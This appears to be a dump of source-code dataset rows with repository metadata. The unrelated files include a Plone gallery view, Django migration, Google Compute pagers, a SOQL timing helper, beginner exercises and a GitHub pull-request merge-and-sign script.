with open('player_status.json',"w") as f:
json.dump({'status':0}, f)
f.close()
return 0
def get_latest_msg_id_json(self):
os.chdir(self.OUTPUT_DIR)
try:
with open('latest_id_status.json') as f:
data = json.load(f)
f.close()
return data['latest_msg_id']
except:
with open('latest_id_status.json',"w") as f:
json.dump({'latest_msg_id':0}, f)
f.close()
return 0
def set_latest_msg_id_json(self):
with open('latest_id_status.json',"w") as f:
json.dump({'latest_msg_id':self.latest_id}, f)
f.close()
def is_okay_to_work(self):
os.chdir(self.OUTPUT_DIR)
if self.get_status_json() == 0:
return True
return False
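# Minimal usage sketch (assumes _SETTINGS supplies `url` and `payload` for the
# message server):
#
#   manager = message_manager()   # loads stored state and fetches new messages once
#   manager.update_loop()         # then polls the server roughly every 10 seconds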
| [
"[email protected]"
] | |
83ffb508c04c0a8d5c6bd89beb8e65a071ecc567 | 5d0edf31b17c5375faf6126c1a7be8e79bfe2ab8 | /buildout-cache/eggs/sc.photogallery-1.0b1-py2.7.egg/sc/photogallery/browser/view.py | 105b30e6969b968feec9c890f33eeb3a1d0d8455 | [] | no_license | renansfs/Plone_SP | 27cba32ebd9fc03dae3941ec23cf1bf0a7b6667a | 8a7bdbdb98c3f9fc1073c6061cd2d3a0ec80caf5 | refs/heads/master | 2021-01-15T15:32:43.138965 | 2016-08-24T15:30:19 | 2016-08-24T15:30:19 | 65,313,812 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 3,418 | py | # -*- coding: utf-8 -*-
from plone import api
from plone.dexterity.browser.view import DefaultView
from plone.memoize import forever
from plone.memoize.instance import memoizedproperty
from sc.photogallery.config import HAS_ZIPEXPORT
from sc.photogallery.interfaces import IPhotoGallerySettings
from sc.photogallery.utils import last_modified
from sc.photogallery.utils import PhotoGalleryMixin
from zope.component import getMultiAdapter
import os
if HAS_ZIPEXPORT:
from ftw.zipexport.generation import ZipGenerator
from ftw.zipexport.interfaces import IZipRepresentation
class View(DefaultView, PhotoGalleryMixin):
"""Slideshow view for Photo Gallery content type."""
def id(self):
return id(self)
@memoizedproperty
def results(self):
return self.context.listFolderContents()
@property
def is_empty(self):
return len(self.results) == 0
def image(self, obj, scale='large'):
"""Return an image scale if the item has an image field.
:param obj: [required]
:type obj: content type object
:param scale: the scale to be used
:type scale: string
"""
scales = obj.restrictedTraverse('@@images')
return scales.scale('image', scale)
def localized_time(self, obj, long_format=False):
"""Return the object time in a user-friendly way.
        :param obj: [required]
        :type obj: content type object
        :param long_format: show long date format if True
        :type long_format: bool
"""
return api.portal.get_localized_time(obj.Date(), long_format)
@property
def can_download(self):
"""Check if original images can be explicitly downloaded, that is,
if downloading is enabled globally and the current object allows it.
"""
record = IPhotoGallerySettings.__identifier__ + '.enable_download'
enabled_globally = api.portal.get_registry_record(record)
allow_download = self.context.allow_download
return enabled_globally and allow_download
def img_size(self, item):
return '{0:.1f} MB'.format(item.size() / float(1024 * 1024))
@property
def can_zipexport(self):
"""Check if original images can be downloaded as a ZIP file,
that is, if ftw.zipexport is installed and downloading is
allowed in the current object.
"""
return HAS_ZIPEXPORT and self.can_download
@property
def last_modified(self):
return last_modified(self.context)
def zip_url(self):
base_url = self.context.absolute_url()
url = '{0}/@@zip/{1}/{2}.zip'.format(
base_url, str(self.last_modified), self.context.getId())
return url
@forever.memoize
def _zip_size(self, last_modified=None):
if not HAS_ZIPEXPORT:
return '{0:.1f} MB'.format(0)
with ZipGenerator() as generator:
for obj in [self.context, ]:
repre = getMultiAdapter(
(obj, self.request), interface=IZipRepresentation)
for path, pointer in repre.get_files():
generator.add_file(path, pointer)
zip_file = generator.generate()
size = os.stat(zip_file.name).st_size
return '{0:.1f} MB'.format(size / float(1024 * 1024))
def zip_size(self):
return self._zip_size(self.last_modified)
| [
"[email protected]"
] | |
ca1535c9186ea6b4058c35374d2cd992af6df474 | a6106cedc42dcab94ccc4ee6d681372d2246ce5e | /python/활용자료/예제/07/ex7-7.py | 12dd6228f533058e5632e76aac1e1c9cac3cc731 | [] | no_license | leemyoungwoo/pybasic | a5a4b68d6b3ddd6f07ff84dc8df76da02650196f | 481075f15613c5d8add9b8c4d523282510d146d2 | refs/heads/master | 2022-10-08T19:57:26.073431 | 2020-06-15T06:50:02 | 2020-06-15T06:50:02 | 267,502,565 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | def circle_area(r) :
area = r * r * 3.14
return area
radius = int(input('원의 반지름을 입력하세요 : '))
result = circle_area(radius)
print('반지름 : %d, 원의 면적 : %.2f' % (radius, result))
radius = int(input('원의 반지름을 입력하세요 : '))
result = circle_area(radius)
print('반지름 : %d, 원의 면적 : %.2f' % (radius, result))
| [
"[email protected]"
] | |
bf4ee2d02a325b438c10d2b86a54a4028c965b9b | 3a6bf7337126c8b1883e76cf1f46cec0886f1447 | /rssdl/rss.py | 0280fcd0436b89dd40e7f313f365f2b62e554d0f | [
"Apache-2.0"
] | permissive | egustafson/rssdl | fc4265edd9138a54005b98bdfc1ea5dfb25707d5 | 2b42d8aa4a0d03d31629d8446e7336c6c1348e58 | refs/heads/master | 2020-12-24T06:57:21.265487 | 2017-09-15T20:59:58 | 2017-09-15T20:59:58 | 58,835,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | """ RSS DOM for RSSDL
"""
import feedparser
class Feed(object):
def __init__(self, href):
self._href = href
self._d = None
def result(self):
return self._d
def parse(self):
self._d = feedparser.parse(self._href)
return self._d.status if 'status' in self._d else 0
def data(self):
return self._d
## Local Variables:
## mode: python
## End:
| [
"[email protected]"
] | |
b6719129deb3753fda7d1da2bf054ef2b0b7086b | bb4e132c5978a1edc2ef4fb78d1bb5a793809408 | /dral_text/migrations/0005_auto_20180421_2332.py | 2011d67aa3e519a34a52ebb3021d281bc28eafa0 | [
"MIT"
] | permissive | n-romanova/dral-django | 7335e581f1fffe0e2d42614678010ead5c9202f3 | 4af92a46e207cc8a427d2f8eafe688c61a73d39e | refs/heads/master | 2020-08-31T03:11:37.199516 | 2019-10-03T17:19:05 | 2019-10-03T17:19:05 | 218,569,974 | 0 | 0 | null | 2019-10-30T16:15:47 | 2019-10-30T16:15:47 | null | UTF-8 | Python | false | false | 707 | py | # Generated by Django 2.0 on 2018-04-21 22:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dral_text', '0004_auto_20180421_2231'),
]
operations = [
migrations.AddField(
model_name='occurence',
name='paraphrase',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='occurence',
name='replace',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='occurence',
name='zero',
field=models.BooleanField(default=False),
),
]
| [
"[email protected]"
] | |
803f3401202b20729ba63a9968b76cfb69eb1b03 | c558d1da1aedf377e6cb6cf66c5136cfb7c32167 | /python-new-trunk/sfapi2/sflib/runWithAnalysis.py | 978d569bb74522ab578050a8fad567a9a6a3a256 | [
"CC0-1.0"
] | permissive | raychorn/svn_molten-magma | 46a8da015844b52fd2fc777225f11b1891b0000a | 8aa2ff2340707eecae6514943e86f5afba9cd54a | refs/heads/main | 2022-12-26T15:45:24.851522 | 2020-10-15T16:52:04 | 2020-10-15T16:52:04 | 304,358,985 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,864 | py | import os, sys
import traceback
from vyperlogix import misc
from vyperlogix.misc import ioTimeAnalysis
import types
import SfStats
sf_stats = SfStats.SfStats()
def dummy():
pass
def init_AnalysisDataPoint(name):
ioTimeAnalysis.initIOTime(name)
def begin_AnalysisDataPoint(name):
ioTimeAnalysis.ioBeginTime(name)
def end_AnalysisDataPoint(name):
ioTimeAnalysis.ioEndTime(name)
def count_query():
sf_stats.count_query()
def runWithAnalysis(func=dummy,args=[],_ioElapsedTime=dummy):
caller = misc.callersName()
ioTimeAnalysis.initIOTime('%s::%s' % (__name__,caller))
ioTimeAnalysis.ioBeginTime('%s::%s' % (__name__,caller))
val = None
try:
if (len(args) == 0):
val = func()
else:
val = func(args)
except:
exc_info = sys.exc_info()
info_string = '\n'.join(traceback.format_exception(*exc_info))
print >>sys.stderr, '(%s) Reason: %s' % (misc.funcName(),info_string)
ioTimeAnalysis.ioEndTime('%s::%s' % (__name__,caller))
ioTimeAnalysis.ioTimeAnalysisReport()
_et = 0
_key_list = [k for k in ioTimeAnalysis._ioTime.keys() if (k.find('SOQL') > -1)]
for _key in _key_list:
_et += (0 if (len(_key) == 0) else ioTimeAnalysis._ioTime[_key][0])
if (_et > 0):
_soql_per_sec = sf_stats.query_count / _et
if (_soql_per_sec > 0):
_ms_per_soql = 1000 / _soql_per_sec
else:
            if (sf_stats.query_count == 0):
                print >>sys.stderr, '(%s) 1.0 Cannot report ms per SOQL because no SOQL queries were counted; recommend using the query-counting functions from this module.' % (misc.funcName())
            else:
                print >>sys.stderr, '(%s) 1.0 Cannot report ms per SOQL because SOQL per second is 0 and we cannot divide by zero.' % (misc.funcName())
            _ms_per_soql = -1
    else:
        print >>sys.stderr, '(%s) 1.0 Cannot report ms per SOQL because there is no reported elapsed time from SOQL activities.' % (misc.funcName())
try:
v_ioElapsedTime = float(ioTimeAnalysis._ioElapsedTime)
if (v_ioElapsedTime > 0):
soql_per_sec = sf_stats.query_count / v_ioElapsedTime
if (soql_per_sec > 0):
ms_per_soql = 1000 / soql_per_sec
else:
print >>sys.stderr, '(%s) 2.0 Cannot correctly report ms per SOQL because SOQL per Second reported 0 and we cannot divide by Zero at this time.' % (misc.funcName())
ms_per_soql = -1
t_analysis_1 = '%-10.2f' % soql_per_sec
t_analysis_2 = '%-10.4f' % ms_per_soql
print >>sys.stdout, '(Apparent) SOQL per second = %s or %s ms per SOQL.' % (t_analysis_1.strip(),t_analysis_2.strip())
if (_et > 0):
_t_analysis_1 = '%-10.2f' % _soql_per_sec
_t_analysis_2 = '%-10.4f' % _ms_per_soql
print >>sys.stdout, '(Actual) SOQL per second = %s or %s ms per SOQL.' % (_t_analysis_1.strip(),_t_analysis_2.strip())
else:
print >>sys.stderr, 'Unable to perform Actual SOQL per second analysis because there is no reported elapsed time from SOQL activities.'
else:
print >>sys.stderr, 'Unable to perform Actual SOQL per second analysis because _ioElapsedTime is %4.2f.' % (v_ioElapsedTime)
except:
exc_info = sys.exc_info()
info_string = '\n'.join(traceback.format_exception(*exc_info))
print >>sys.stderr, '(%s) Reason: %s' % (misc.funcName(),info_string)
print >>sys.stdout, 'SOQL Count=%d' % sf_stats.query_count
return val
| [
"[email protected]"
] | |
9301a8e19c39fa597a374ec83ca5ac9308d25d56 | e9032e64138d7b9dd90a330dfe4588e2c83f6667 | /google/cloud/compute_v1/services/url_maps/pagers.py | 1a5d42fc43ca21958c622ecbbf65987afbee0aa4 | [
"Apache-2.0"
] | permissive | Ctfbuster/python-compute | 6cff2418969009794c3fadadc4c45e20d7b40509 | 7a9e8324e08c46a93050908760b2b5aca054a863 | refs/heads/main | 2023-08-26T12:37:52.363526 | 2021-10-04T15:34:37 | 2021-10-04T15:34:37 | 412,884,620 | 0 | 0 | Apache-2.0 | 2021-10-02T18:49:05 | 2021-10-02T18:49:03 | null | UTF-8 | Python | false | false | 5,578 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import (
Any,
AsyncIterable,
Awaitable,
Callable,
Iterable,
Sequence,
Tuple,
Optional,
)
from google.cloud.compute_v1.types import compute
class AggregatedListPager:
"""A pager for iterating through ``aggregated_list`` requests.
This class thinly wraps an initial
:class:`google.cloud.compute_v1.types.UrlMapsAggregatedList` object, and
provides an ``__iter__`` method to iterate through its
``items`` field.
If there are more pages, the ``__iter__`` method will make additional
``AggregatedList`` requests and continue to iterate
through the ``items`` field on the
corresponding responses.
All the usual :class:`google.cloud.compute_v1.types.UrlMapsAggregatedList`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(
self,
method: Callable[..., compute.UrlMapsAggregatedList],
request: compute.AggregatedListUrlMapsRequest,
response: compute.UrlMapsAggregatedList,
*,
metadata: Sequence[Tuple[str, str]] = ()
):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.compute_v1.types.AggregatedListUrlMapsRequest):
The initial request object.
response (google.cloud.compute_v1.types.UrlMapsAggregatedList):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = compute.AggregatedListUrlMapsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[compute.UrlMapsAggregatedList]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[Tuple[str, compute.UrlMapsScopedList]]:
for page in self.pages:
yield from page.items.items()
def get(self, key: str) -> Optional[compute.UrlMapsScopedList]:
return self._response.items.get(key)
def __repr__(self) -> str:
return "{0}<{1!r}>".format(self.__class__.__name__, self._response)
class ListPager:
"""A pager for iterating through ``list`` requests.
This class thinly wraps an initial
:class:`google.cloud.compute_v1.types.UrlMapList` object, and
provides an ``__iter__`` method to iterate through its
``items`` field.
If there are more pages, the ``__iter__`` method will make additional
``List`` requests and continue to iterate
through the ``items`` field on the
corresponding responses.
All the usual :class:`google.cloud.compute_v1.types.UrlMapList`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(
self,
method: Callable[..., compute.UrlMapList],
request: compute.ListUrlMapsRequest,
response: compute.UrlMapList,
*,
metadata: Sequence[Tuple[str, str]] = ()
):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.compute_v1.types.ListUrlMapsRequest):
The initial request object.
response (google.cloud.compute_v1.types.UrlMapList):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = compute.ListUrlMapsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[compute.UrlMapList]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[compute.UrlMap]:
for page in self.pages:
yield from page.items
def __repr__(self) -> str:
return "{0}<{1!r}>".format(self.__class__.__name__, self._response)
| [
"[email protected]"
] | |
e40a9f4648944ecbb580038b5267b736e6a1cc7a | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /TmasgxCm6iz3gTGHk_18.py | f0c40f2ac8ab47faef818d3f66b85e4ebaed9fb1 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 733 | py | """
Write a function that returns the **length of the shortest contiguous
sublist** whose sum of all elements **strictly exceeds** `n`.
### Examples
min_length([5, 8, 2, -1, 3, 4], 9) ➞ 2
min_length([3, -1, 4, -2, -7, 2], 4) ➞ 3
# Shortest sublist whose sum exceeds 4 is: [3, -1, 4]
min_length([1, 0, 0, 0, 1], 1) ➞ 5
min_length([0, 1, 1, 0], 2) ➞ -1
### Notes
* The sublist should be composed of **contiguous elements** from the original list.
* If no such sublist exists, return `-1`.
"""
def min_length(lst, n):
    for i in range(1, len(lst) + 1):
        sublists = [lst[j:j + i] for j in range(0, len(lst) - i + 1)]
        for sub in sublists:
            if sum(sub) > n:
                return i
    return -1
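# Walkthrough for min_length([3, -1, 4, -2, -7, 2], 4):
#   length 1: the largest single element is 4, which is not strictly greater than 4
#   length 2: sums are 2, 3, 2, -9, -5 -> none exceed 4
#   length 3: [3, -1, 4] sums to 6 > 4 -> the function returns 3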
| [
"[email protected]"
] | |
5ebff17593beda1effd5a60635d6921fc7b98ab2 | 07cabeb47bd7c9a4e06e824ece28631c7d7441a1 | /virtual/bin/easy_install | d66210d85b88436a51d477c4ceeb85a8a146d4c6 | [
"MIT"
] | permissive | Jeffmusa/PITCH-POOL | bd2b27ea5bc5b47499c0b822c46ff518eae5f2f4 | 96654a3ba7fc3f4ba00d7fb617644cc9cd5ba041 | refs/heads/master | 2020-03-28T04:17:07.471479 | 2018-09-13T13:21:17 | 2018-09-13T13:21:17 | 147,705,197 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 257 | #!/home/vicklyne/Pitch/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
ed4725673a73387fa9143bfc3a1a63fd28e669a2 | 9cabdeb8dce5718e8f4f490f3684eba0eb1f2d2e | /contrib/devtools/github-merge.py | 709b20287ca325e74972a29584e54ec67e442f2a | [
"MIT",
"LicenseRef-scancode-public-domain"
] | permissive | wolfoxonly/woo | fcfe275007cb102fff10239b0f722264dbbd40e2 | a5fb13575afe855b58915bd8e15cbffb9015e5e2 | refs/heads/master | 2020-03-09T17:00:57.668308 | 2018-05-13T15:21:17 | 2018-05-13T15:21:17 | 127,590,136 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,970 | py | #!/usr/bin/env python3
# Copyright (c) 2016-2017 Woochain Core Developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
# This script will locally construct a merge commit for a pull request on a
# github repository, inspect it, sign it and optionally push it.
# The following temporary branches are created/overwritten and deleted:
# * pull/$PULL/base (the current master we're merging onto)
# * pull/$PULL/head (the current state of the remote pull request)
# * pull/$PULL/merge (github's merge)
# * pull/$PULL/local-merge (our merge)
# In case of a clean merge that is accepted by the user, the local branch with
# name $BRANCH is overwritten with the merged result, and optionally pushed.
from __future__ import division,print_function,unicode_literals
import os
from sys import stdin,stdout,stderr
import argparse
import hashlib
import subprocess
import sys
import json,codecs
try:
from urllib.request import Request,urlopen
except:
from urllib2 import Request,urlopen
# External tools (can be overridden using environment)
GIT = os.getenv('GIT','git')
BASH = os.getenv('BASH','bash')
# OS specific configuration for terminal attributes
ATTR_RESET = ''
ATTR_PR = ''
COMMIT_FORMAT = '%h %s (%an)%d'
if os.name == 'posix': # if posix, assume we can use basic terminal escapes
ATTR_RESET = '\033[0m'
ATTR_PR = '\033[1;36m'
COMMIT_FORMAT = '%C(bold blue)%h%Creset %s %C(cyan)(%an)%Creset%C(green)%d%Creset'
def git_config_get(option, default=None):
'''
Get named configuration option from git repository.
'''
try:
return subprocess.check_output([GIT,'config','--get',option]).rstrip().decode('utf-8')
except subprocess.CalledProcessError as e:
return default
def retrieve_pr_info(repo,pull):
'''
Retrieve pull request information from github.
Return None if no title can be found, or an error happens.
'''
try:
req = Request("https://api.github.com/repos/"+repo+"/pulls/"+pull)
result = urlopen(req)
reader = codecs.getreader('utf-8')
obj = json.load(reader(result))
return obj
except Exception as e:
print('Warning: unable to retrieve pull information from github: %s' % e)
return None
def ask_prompt(text):
print(text,end=" ",file=stderr)
stderr.flush()
reply = stdin.readline().rstrip()
print("",file=stderr)
return reply
def get_symlink_files():
files = sorted(subprocess.check_output([GIT, 'ls-tree', '--full-tree', '-r', 'HEAD']).splitlines())
ret = []
for f in files:
if (int(f.decode('utf-8').split(" ")[0], 8) & 0o170000) == 0o120000:
ret.append(f.decode('utf-8').split("\t")[1])
return ret
def tree_sha512sum(commit='HEAD'):
# request metadata for entire tree, recursively
files = []
blob_by_name = {}
for line in subprocess.check_output([GIT, 'ls-tree', '--full-tree', '-r', commit]).splitlines():
name_sep = line.index(b'\t')
metadata = line[:name_sep].split() # perms, 'blob', blobid
assert(metadata[1] == b'blob')
name = line[name_sep+1:]
files.append(name)
blob_by_name[name] = metadata[2]
files.sort()
# open connection to git-cat-file in batch mode to request data for all blobs
# this is much faster than launching it per file
p = subprocess.Popen([GIT, 'cat-file', '--batch'], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
overall = hashlib.sha512()
for f in files:
blob = blob_by_name[f]
# request blob
p.stdin.write(blob + b'\n')
p.stdin.flush()
# read header: blob, "blob", size
reply = p.stdout.readline().split()
assert(reply[0] == blob and reply[1] == b'blob')
size = int(reply[2])
# hash the blob data
intern = hashlib.sha512()
ptr = 0
while ptr < size:
bs = min(65536, size - ptr)
piece = p.stdout.read(bs)
if len(piece) == bs:
intern.update(piece)
else:
raise IOError('Premature EOF reading git cat-file output')
ptr += bs
dig = intern.hexdigest()
assert(p.stdout.read(1) == b'\n') # ignore LF that follows blob data
# update overall hash with file hash
overall.update(dig.encode("utf-8"))
overall.update(" ".encode("utf-8"))
overall.update(f)
overall.update("\n".encode("utf-8"))
p.stdin.close()
if p.wait():
raise IOError('Non-zero return value executing git cat-file')
return overall.hexdigest()
def print_merge_details(pull, title, branch, base_branch, head_branch):
print('%s#%s%s %s %sinto %s%s' % (ATTR_RESET+ATTR_PR,pull,ATTR_RESET,title,ATTR_RESET+ATTR_PR,branch,ATTR_RESET))
subprocess.check_call([GIT,'log','--graph','--topo-order','--pretty=format:'+COMMIT_FORMAT,base_branch+'..'+head_branch])
def parse_arguments():
epilog = '''
In addition, you can set the following git configuration variables:
githubmerge.repository (mandatory),
user.signingkey (mandatory),
githubmerge.host (default: [email protected]),
githubmerge.branch (no default),
githubmerge.testcmd (default: none).
'''
parser = argparse.ArgumentParser(description='Utility to merge, sign and push github pull requests',
epilog=epilog)
parser.add_argument('pull', metavar='PULL', type=int, nargs=1,
help='Pull request ID to merge')
parser.add_argument('branch', metavar='BRANCH', type=str, nargs='?',
default=None, help='Branch to merge against (default: githubmerge.branch setting, or base branch for pull, or \'master\')')
return parser.parse_args()
def main():
# Extract settings from git repo
repo = git_config_get('githubmerge.repository')
host = git_config_get('githubmerge.host','[email protected]')
opt_branch = git_config_get('githubmerge.branch',None)
testcmd = git_config_get('githubmerge.testcmd')
signingkey = git_config_get('user.signingkey')
if repo is None:
print("ERROR: No repository configured. Use this command to set:", file=stderr)
print("git config githubmerge.repository <owner>/<repo>", file=stderr)
sys.exit(1)
if signingkey is None:
print("ERROR: No GPG signing key set. Set one using:",file=stderr)
print("git config --global user.signingkey <key>",file=stderr)
sys.exit(1)
host_repo = host+":"+repo # shortcut for push/pull target
# Extract settings from command line
args = parse_arguments()
pull = str(args.pull[0])
# Receive pull information from github
info = retrieve_pr_info(repo,pull)
if info is None:
sys.exit(1)
title = info['title'].strip()
body = info['body'].strip()
# precedence order for destination branch argument:
# - command line argument
# - githubmerge.branch setting
# - base branch for pull (as retrieved from github)
# - 'master'
branch = args.branch or opt_branch or info['base']['ref'] or 'master'
# Initialize source branches
head_branch = 'pull/'+pull+'/head'
base_branch = 'pull/'+pull+'/base'
merge_branch = 'pull/'+pull+'/merge'
local_merge_branch = 'pull/'+pull+'/local-merge'
devnull = open(os.devnull,'w')
try:
subprocess.check_call([GIT,'checkout','-q',branch])
except subprocess.CalledProcessError as e:
print("ERROR: Cannot check out branch %s." % (branch), file=stderr)
sys.exit(3)
try:
subprocess.check_call([GIT,'fetch','-q',host_repo,'+refs/pull/'+pull+'/*:refs/heads/pull/'+pull+'/*',
'+refs/heads/'+branch+':refs/heads/'+base_branch])
except subprocess.CalledProcessError as e:
print("ERROR: Cannot find pull request #%s or branch %s on %s." % (pull,branch,host_repo), file=stderr)
sys.exit(3)
try:
subprocess.check_call([GIT,'log','-q','-1','refs/heads/'+head_branch], stdout=devnull, stderr=stdout)
except subprocess.CalledProcessError as e:
print("ERROR: Cannot find head of pull request #%s on %s." % (pull,host_repo), file=stderr)
sys.exit(3)
try:
subprocess.check_call([GIT,'log','-q','-1','refs/heads/'+merge_branch], stdout=devnull, stderr=stdout)
except subprocess.CalledProcessError as e:
print("ERROR: Cannot find merge of pull request #%s on %s." % (pull,host_repo), file=stderr)
sys.exit(3)
subprocess.check_call([GIT,'checkout','-q',base_branch])
subprocess.call([GIT,'branch','-q','-D',local_merge_branch], stderr=devnull)
subprocess.check_call([GIT,'checkout','-q','-b',local_merge_branch])
try:
# Go up to the repository's root.
toplevel = subprocess.check_output([GIT,'rev-parse','--show-toplevel']).strip()
os.chdir(toplevel)
# Create unsigned merge commit.
if title:
firstline = 'Merge #%s: %s' % (pull,title)
else:
firstline = 'Merge #%s' % (pull,)
message = firstline + '\n\n'
message += subprocess.check_output([GIT,'log','--no-merges','--topo-order','--pretty=format:%h %s (%an)',base_branch+'..'+head_branch]).decode('utf-8')
message += '\n\nPull request description:\n\n ' + body.replace('\n', '\n ') + '\n'
try:
subprocess.check_call([GIT,'merge','-q','--commit','--no-edit','--no-ff','-m',message.encode('utf-8'),head_branch])
except subprocess.CalledProcessError as e:
print("ERROR: Cannot be merged cleanly.",file=stderr)
subprocess.check_call([GIT,'merge','--abort'])
sys.exit(4)
logmsg = subprocess.check_output([GIT,'log','--pretty=format:%s','-n','1']).decode('utf-8')
if logmsg.rstrip() != firstline.rstrip():
print("ERROR: Creating merge failed (already merged?).",file=stderr)
sys.exit(4)
symlink_files = get_symlink_files()
for f in symlink_files:
print("ERROR: File %s was a symlink" % f)
if len(symlink_files) > 0:
sys.exit(4)
# Put tree SHA512 into the message
try:
first_sha512 = tree_sha512sum()
message += '\n\nTree-SHA512: ' + first_sha512
except subprocess.CalledProcessError as e:
print("ERROR: Unable to compute tree hash")
sys.exit(4)
try:
subprocess.check_call([GIT,'commit','--amend','-m',message.encode('utf-8')])
except subprocess.CalledProcessError as e:
print("ERROR: Cannot update message.", file=stderr)
sys.exit(4)
print_merge_details(pull, title, branch, base_branch, head_branch)
print()
# Run test command if configured.
if testcmd:
if subprocess.call(testcmd,shell=True):
print("ERROR: Running %s failed." % testcmd,file=stderr)
sys.exit(5)
# Show the created merge.
diff = subprocess.check_output([GIT,'diff',merge_branch+'..'+local_merge_branch])
subprocess.check_call([GIT,'diff',base_branch+'..'+local_merge_branch])
if diff:
print("WARNING: merge differs from github!",file=stderr)
reply = ask_prompt("Type 'ignore' to continue.")
if reply.lower() == 'ignore':
print("Difference with github ignored.",file=stderr)
else:
sys.exit(6)
else:
# Verify the result manually.
print("Dropping you on a shell so you can try building/testing the merged source.",file=stderr)
print("Run 'git diff HEAD~' to show the changes being merged.",file=stderr)
print("Type 'exit' when done.",file=stderr)
if os.path.isfile('/etc/debian_version'): # Show pull number on Debian default prompt
os.putenv('debian_chroot',pull)
subprocess.call([BASH,'-i'])
second_sha512 = tree_sha512sum()
if first_sha512 != second_sha512:
print("ERROR: Tree hash changed unexpectedly",file=stderr)
sys.exit(8)
# Sign the merge commit.
print_merge_details(pull, title, branch, base_branch, head_branch)
while True:
reply = ask_prompt("Type 's' to sign off on the above merge, or 'x' to reject and exit.").lower()
if reply == 's':
try:
subprocess.check_call([GIT,'commit','-q','--gpg-sign','--amend','--no-edit'])
break
except subprocess.CalledProcessError as e:
print("Error while signing, asking again.",file=stderr)
elif reply == 'x':
print("Not signing off on merge, exiting.",file=stderr)
sys.exit(1)
# Put the result in branch.
subprocess.check_call([GIT,'checkout','-q',branch])
subprocess.check_call([GIT,'reset','-q','--hard',local_merge_branch])
finally:
# Clean up temporary branches.
subprocess.call([GIT,'checkout','-q',branch])
subprocess.call([GIT,'branch','-q','-D',head_branch],stderr=devnull)
subprocess.call([GIT,'branch','-q','-D',base_branch],stderr=devnull)
subprocess.call([GIT,'branch','-q','-D',merge_branch],stderr=devnull)
subprocess.call([GIT,'branch','-q','-D',local_merge_branch],stderr=devnull)
# Push the result.
while True:
reply = ask_prompt("Type 'push' to push the result to %s, branch %s, or 'x' to exit without pushing." % (host_repo,branch)).lower()
if reply == 'push':
subprocess.check_call([GIT,'push',host_repo,'refs/heads/'+branch])
break
elif reply == 'x':
sys.exit(1)
if __name__ == '__main__':
main()
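# ----------------------------------------------------------------------------
# Added usage sketch (not part of the original script). The configuration keys
# mirror the ones read in main() via git_config_get; the repository name, key
# id, test command and script filename below are placeholder values.
#
#   git config githubmerge.repository <owner>/<repo>
#   git config --global user.signingkey <your-gpg-key-id>
#   git config githubmerge.testcmd "make check"     # optional
#   ./github-merge.py 12345                         # merge pull request #12345
# ----------------------------------------------------------------------------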
| [
"[email protected]"
] | |
349da3c46b25c597a4fea4b6ffed199281d111b3 | e61e664d95af3b93150cda5b92695be6551d2a7c | /vega/metrics/tensorflow/__init__.py | 5eb861df8a3c94200471f2efbde2cb138194a48e | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | huawei-noah/vega | 44aaf8bb28b45f707ed6cd4e871ba70fc0c04846 | 12e37a1991eb6771a2999fe0a46ddda920c47948 | refs/heads/master | 2023-09-01T20:16:28.746745 | 2023-02-15T09:36:59 | 2023-02-15T09:36:59 | 273,667,533 | 850 | 184 | NOASSERTION | 2023-02-15T09:37:01 | 2020-06-20T08:20:06 | Python | UTF-8 | Python | false | false | 449 | py | from vega.common.class_factory import ClassFactory
from .metrics import Metrics
ClassFactory.lazy_register("vega.metrics.tensorflow", {
"segmentation_metric": ["trainer.metric:IoUMetric"],
"classifier_metric": ["trainer.metric:accuracy"],
